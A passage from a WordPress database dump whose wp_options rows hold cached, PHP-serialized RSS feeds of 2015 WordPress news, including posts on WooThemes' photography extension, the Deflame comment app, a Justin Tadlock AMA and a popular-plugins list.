album from a lot of photos to fewer photos</li>\n<li>Choosing to make an album visible to a wedding party or others that may want to purchase, in addition to a client</li>\n<li>Creating a more visual gallery of an album, versus a &#8220;purchase&#8221; view</li>\n<li>Enabling uploads to be synchronous with an editing tool, like Lightroom</li>\n<li>Enabling categorization, automated meta data, and various grouping mechanisms for photos</li>\n<li>The ability to quickly send the same or select photos from a client-viewed album to a new gallery for a blog post about a client event</li>\n<li>Integrating a photo fulfillment service, to actually print and deliver purchased photos</li>\n<li>And much more</li>\n</ul>\n<p>I&#8217;m sure WooThemes has done a good bit of research for this product. However, I think they&#8217;ve made a feature that&#8217;s not yet ready for your every day photographer. Of the photographers I met, most lamented the experience of creating, managing, and selling photos and albums.</p>\n<p>I think that there is a lot of room in the self-hosted photography space, and my reasoning is simple. Right now, selling photos and managing albums, client review, etc., on hosted services is super expensive. Plenty of services charge hundreds or even thousands of dollars per year, and/or charge massive per-purchase fees (like 10%+).</p>\n<p>A self-hosted, WordPress-integrated photography management solution &#8212; built for WordPress professionals &#8212; could be a million dollar idea on its own. I think WooCommerce creating this add-on is an interesting start, but I believe the concept has major legs that could grow into something huge.</p>\n<h3>Here are some other players in the market</h3>\n<p>Let&#8217;s start within the WordPress space:</p>\n<ul>\n<li><a href=\"http://www.photocrati.com/photography-wordpress-themes/\">Photocrati</a> &#8212; a theme plus eCommerce, gallery, and other features (these are the folks behind NextGen)</li>\n<li><a href=\"https://graphpaperpress.com/plugins/sell-media/\">Sell Media</a> &#8212; Graph Paper Press&#8217;s spin on selling media and prints. If I recall correctly, this is a fork of EDD customized for their photo-heavy theme collection</li>\n<li><a href=\"http://www.prophoto.com/explore-features/\">ProPhoto</a> &#8212; hideous but one of the more &#8220;full service&#8221; photography website options, minus selling</li>\n<li><a href=\"https://easydigitaldownloads.com/\">Easy Digital Downloads</a> &#8212; Out of the box, EDD could be used for selling photos</li>\n<li><a href=\"https://ithemes.com/exchange/\">Exchange</a> &#8212; Out of the box, Exchange could be used for selling photos</li>\n</ul>\n<p>No WordPress product is really providing a full solution though. Plenty of non-WordPress products are trying. Here are some that are interseting to look into:</p>\n<ul>\n<li><a href=\"http://www.smugmug.com/pro\">SmugMug</a> &#8212; A compelling, hosted option. Probably the most interesting in the market.</li>\n<li><a href=\"http://www.instaproofs.com/home/how-it-works.html\">InstaProofs</a> &#8212; A widely used method for proofing, selling, and fulfilling photo orders. (Requires 8%-15% commissions!)</li>\n<li><a href=\"https://discover.pictage.com/features\">Pictage</a> &amp; <a href=\"https://web.shootq.com/\">ShootQ</a> &#8212; The most vertically integrated options: from initial lead to photo fulfillment. These two are quite popular, but are expensive SaaS products.</li>\n<li>There are loads of these, but these are popular ones, and give you an idea of what WordPress-oriented products are up against.</li>\n</ul>\n<h3>I don&#8217;t envy professional photographers on the web</h3>\n<p>Professional photographers have a lot to juggle.</p>\n<p>They&#8217;ve got to manage leads, their website copy, their contacts and CRM, their galleries and portfolio, their client albums and workflow, their events, their raw copies of photos and backups, the ability for clients to buy from them, and more.</p>\n<p>Managing this entire setup online is possible, but right now a photographer with a WordPress website and a third party system for album reviews, sales, and leads is kind of lame.</p>\n<p><span class=\"pullquote alignright\">I think WordPress can do a better job, and reduce expenses for professional photographers, while enabling them to have a more synchronized web experience for their clients.</span> I think WooCommerce introducing a Photography extension is one piece of the puzzle, but it doesn&#8217;t solve the over-arching problem.</p>\n<p>I truly believe someone could create a theme and plugin shop that competes with these third parties. But it needs to have a lot going for it: beautiful display, an easy to use interface (I&#8217;m not sure the back-end of WordPress counts as this), help photographers not continuously repeat themselves during photo management, and generally make their life as a professional photographer easier.</p>\n<p>Hosted services are tackling this problem. Those photographers managing their websites on WordPress may have more freedom and lower costs, but right now the experience isn&#8217;t easier.</p>\n<p>WooThemes is making a good first step. I&#8217;m not sure that they are the right team to really go 100% though. I&#8217;d be interested to see another company build something integrated into this product from WooThemes (or another WordPress eCommerce product) and really solve professional photographers&#8217; workflow grievances.</p>\n<p>Like I said, I interviewed about a dozen photographers from different backgrounds. None of those interviewed felt particularly satisfied with their web workflows. There is room in this market. My question is: who will fulfill their needs?</p>\n<p>I think it can be a self-hosted product or hosted product, or both. But I think WordPress should be an excellent tool for photographers, and right now it&#8217;s not.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 21:30:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: SPIEGEL Interviews Dean Baquet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44634\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://ma.tt/2015/01/spiegel-interviews-dean-baquet/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:835:\"<blockquote><p>SPIEGEL: One of the reasons Snowden didn&#8217;t approach the New York Times was that the paper had refused to publish the initial research about the NSA&#8217;s bulk collection in 2004. The story was only published almost a year later. Was it a mistake to have held back on that reporting?</p></blockquote>\n<p> <a href=\"http://www.spiegel.de/international/business/spiegel-interview-with-chief-new-york-times-editor-dean-baquet-a-1014704.html\">This interview with Chief New York Times Editor Dean Baquet is remarkable</a> both for its frank, direct questions and its frank, direct answers. I got to meet with Dean <a href=\"https://matt.wordpress.com/2014/11/19/new-york-times-board-room/\">a few months ago</a> and it really struck me how excellent he and the other editorial and product folks inside of the NYT are.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 23:33:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: Deflame Web App Aims to Improve Discussion on WordPress Blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37875\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/deflame-web-app-aims-to-improve-discussion-on-wordpress-blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4788:\"<p><span class=\"embed-youtube\"></span></p>\n<p>Life on the internet is full of controversial debates, people with strong opinions, and trolls, occasionally mixed in with intelligent, engaging conversation. You never know what you will encounter when you venture into the comments section on <a href=\"http://wptavern.com/why-comments-still-matter\" target=\"_blank\">blogs with open discussion enabled</a>, but that&#8217;s the beauty of free expression.</p>\n<p>The Tavern has always been a place where anyone is welcome to offer opinions in the comments, even if they&#8217;re not fully polished. Oftentimes this results in some quality interaction from community leaders. We use Jetpack comments, but the module is lacking in features that add a more interactive discussion experience between commenters.</p>\n<p><a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is a new web app, created by <a href=\"https://github.com/alexbecker\" target=\"_blank\">Alex Becker</a>, that aims to improve the quality of discourse on the internet. Both the standalone app and the Chrome extension were built to work with WordPress sites, since the platform currently dominates the web. Deflame offers three features that allow users to &#8220;ignore asshats,&#8221; delineate a side in debate, and share their perceptions of an argument with others via a unique URL.</p>\n<p>I tested the standalone version and the Chrome extension, using a recent WP Tavern <a href=\"http://wptavern.com/heropress-launches-kickstarter-campaign-to-highlight-wordpress-developers\" target=\"_blank\">post regarding HeroPress</a>, which sparked some heated debate. The app adds radio buttons to identify comment authors with whom you agree or disagree. You also have the option to ignore comments.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png\" rel=\"prettyphoto[37875]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png?resize=1025%2C1017\" alt=\"deflama-example\" class=\"aligncenter size-full wp-image-37889\" /></a></p>\n<p>It&#8217;s unclear why sometimes the comments receive two radio buttons, but it&#8217;s likely that the app cannot accurately anticipate the correct placement of the buttons due to differences in comment templates. Once you mark your opinions in the comments, clicking the Chrome extension button will present a summarized table at the top of the page. It includes a unique URL that allows you to share your view of the debate with the flames dampened.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg\" rel=\"prettyphoto[37875]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg?resize=755%2C235\" alt=\"deflame-summary\" class=\"aligncenter size-full wp-image-37910\" /></a></p>\n<p>Becker hopes that the app will give users a way to frame their positions and perceptions on debates that happen in the comments. &#8220;Too often, debates over important issues devolve into reasonable people on both sides attacking the trolls or madmen they perceive as representing the opposition,&#8221; he said. &#8220;Deflame aims to give commenters on WordPress-powered blogs the ability to rise above this.&#8221;</p>\n<p>Since the app doesn&#8217;t actually affect the website on which it&#8217;s being used, it offers an independent way of presenting a user-moderated discussion. Users can show an overview of their opinions, even when a site doesn&#8217;t offer interactive voting features for comments.</p>\n<p>However, some may not be comfortable with the fact that the app&#8217;s share link hides comments that have been ignored. The ability to view all comments is the only way to get the proper context for other comments posted in a debate. If visitors arrive to a site by clicking on a Deflame-generated link, they may not understand that they are only viewing a select group of comments. For this reason, I think an additional button to &#8220;show hidden comments&#8221; would be useful.</p>\n<p>Overall, <a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is an interesting idea that might make a useful WordPress plugin, if its code licensing permits. The project is available on <a href=\"https://github.com/alexbecker/deflame\" target=\"_blank\">GitHub</a>. It includes a small <a href=\"https://github.com/alexbecker/deflame/blob/master/supported.md\" target=\"_blank\">list of supported sites</a>, though the extension works reliably on many more that are not included in the list. If you want to test it, check out the <a href=\"http://defla.me/webapp.html\" target=\"_blank\">standalone  Deflame app</a> or install the <a href=\"https://chrome.google.com/webstore/detail/deflame/bfaljebllekeebnpajhkoambfhflhjfk\" target=\"_blank\">Chrome extension</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 20:41:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WPTavern: WP Chat Hosts AMA with Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37863\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wptavern.com/wp-chat-hosts-ama-with-justin-tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3905:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg\" rel=\"prettyphoto[37863]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg?resize=150%2C150\" alt=\"jt\" class=\"alignright size-full wp-image-12052\" /></a></p>\n<p>WP Chat is currently hosting an AMA (&#8220;Ask Me Anything&#8221;) session with Justin Tadlock, founder of <a href=\"http://themehybrid.com/\" target=\"_blank\">Theme Hybrid</a> and co-author of <a href=\"http://www.amazon.com/Professional-WordPress-Plugin-Development-Williams/dp/0470916222/\" target=\"_blank\">Professional WordPress Plugin Development</a>. Tadlock recently <a href=\"http://wptavern.com/justin-tadlock-joins-forces-with-emil-uzelac-to-provide-wordpress-theme-review-as-a-service\" target=\"_blank\">joined forces with fellow WordPress.org Theme Review team member Emil Uzelac</a> to provide theme review as a service.</p>\n<p><a href=\"https://twitter.com/lelandf\" target=\"_blank\">Leland Fiegel</a>, founder of WP Chat, invited Tadlock as the first guest in <a href=\"https://wpchat.com/t/announcing-wpchat-amas-and-our-first-guest/571\" target=\"_blank\">a series of AMAs</a> with WordPress community members. If you&#8217;re new to the format, Fiegel recommends that you check out<a href=\"http://www.reddit.com/r/IAmA/comments/1jg781/i_am_matt_mullenweg_cofounder_of_wordpress_18_of/\" target=\"_blank\"> Matt Mullenweg&#8217;s AMA</a>, which was hosted on Reddit a year ago. Fiegel has a similar question-and-answer setup running Discourse, which is less ideal to navigate but gets the job done.</p>\n<p>Theme Hybrid is one of the oldest WordPress theme shops in business. As a long-time theme and plugin developer, Tadlock has witnessed WordPress trends over the years and has helped to shape theme development best practices. So far, a couple of the highlights from the AMA include:</p>\n<p><strong>Q: Advice for someone working full-time in an unrelated field trying to break into the WP business? I&#8217;ve been waking up at 5am for years to learn and practice WP dev but it sure seems slow going with the full-time job necessary to feed my family.</strong></p>\n<blockquote><p>Start a WordPress-related blog. Write tutorials. Share things that you learn. Learn things by writing about them. That&#8217;s how I got to know people in the community. It&#8217;s also how I was able to successfully launch Theme Hybrid.</p>\n<p>And, always reply to comments on your blog. You&#8217;ve got to interact with your readers. At a certain point, that gets tough, but keep the conversation going.</p></blockquote>\n<p><strong>Q: What is the worst thing about WordPress (the software) in your opinion? How can it be made better?</strong></p>\n<blockquote><p>From a pure user perspective, I&#8217;d like to see the admin simplified even more. Get rid of anything that&#8217;s not necessary. I&#8217;d drop the theme/plugin editors and tools screen for starters. Then, I&#8217;d work on figuring out how to simplify the post screen as much as possible.</p></blockquote>\n<p>Ever curious about the future of post formats, I asked Tadlock if he likes them and if he believes they have a future. He replied:</p>\n<blockquote><p>I love post formats. They&#8217;ve really been around for as long as I&#8217;ve been using WP (anyone remember <a href=\"http://ma.tt/2004/05/asides/\" target=\"_blank\">Matt&#8217;s asides</a>?). I think the initial build was put in too soon, so it&#8217;s created some problems for theme authors. I feel like I&#8217;ve overcome most of those issues with the post formats-related code in Hybrid Core.</p></blockquote>\n<p>If you&#8217;re a new or experienced theme developer, this is your chance to <a href=\"https://wpchat.com/t/i-am-justin-tadlock-ask-me-anything/600\" target=\"_blank\">ask Tadlock anything</a>. The WP Chat thread will be open for approximately 24-36 hours, if you have a question for Tadlock and want to join in.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 17:55:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: Build a CMS?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44627\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://ma.tt/2015/01/build-a-cms/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:224:\"<p>Austin Smith at Mediashift talks about <a href=\"http://www.pbs.org/mediashift/2015/01/why-its-risky-business-for-publishers-to-build-their-own-cms/\">Why It’s Risky Business for Publishers to Build Their Own CMS</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 05:00:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 08 Feb 2015 16:09:48 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"225206\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Sun, 08 Feb 2015 16:00:14 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20141124234515\";}", "no");
INSERT INTO `wp_options` VALUES("883", "_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9", "1423454988", "no");
INSERT INTO `wp_options` VALUES("884", "_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9", "1423411788", "no");
INSERT INTO `wp_options` VALUES("885", "_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109", "1423454989", "no");
INSERT INTO `wp_options` VALUES("886", "_transient_feed_b9388c83948825c1edaef0d856b7b109", "a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n	\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"WordPress Plugins » View: Most Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Feb 2015 15:39:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Akismet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/plugins/akismet/#post-15\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:11:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"15@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Akismet checks your comments against the Akismet Web service to see if they look like spam or not.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 